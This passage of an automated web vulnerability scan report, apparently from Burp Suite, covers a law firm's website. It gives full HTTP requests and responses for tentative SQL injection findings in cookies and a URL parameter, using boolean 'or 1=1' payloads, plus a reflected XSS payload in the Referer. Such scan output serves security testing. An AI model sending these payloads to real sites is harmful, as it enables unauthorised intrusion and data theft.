Set-Cookie: PCONNECTID=;expires=Thu, 13-May-2010 00:36:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=67778256'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.32. http://www.pillsburylaw.com/a [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 79438194'%20or%201%3d1--%20 and 79438194'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=79438194'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Thu, 13-May-2010 00:36:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=79438194'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.33. http://www.pillsburylaw.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20667745'%20or%201%3d1--%20 and 20667745'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a20667745'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:37:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /a20667745'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 13 May 2011 00:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.34. http://www.pillsburylaw.com/a [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 80264836'%20or%201%3d1--%20 and 80264836'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.480264836'%20or%201%3d1--%20; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Thu, 13-May-2010 00:34:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.480264836'%20or%201%3d2--%20; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.35. http://www.pillsburylaw.com/a [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 86405570%20or%201%3d1--%20 and 86405570%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704686405570%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Thu, 13-May-2010 00:36:56 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704686405570%20or%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

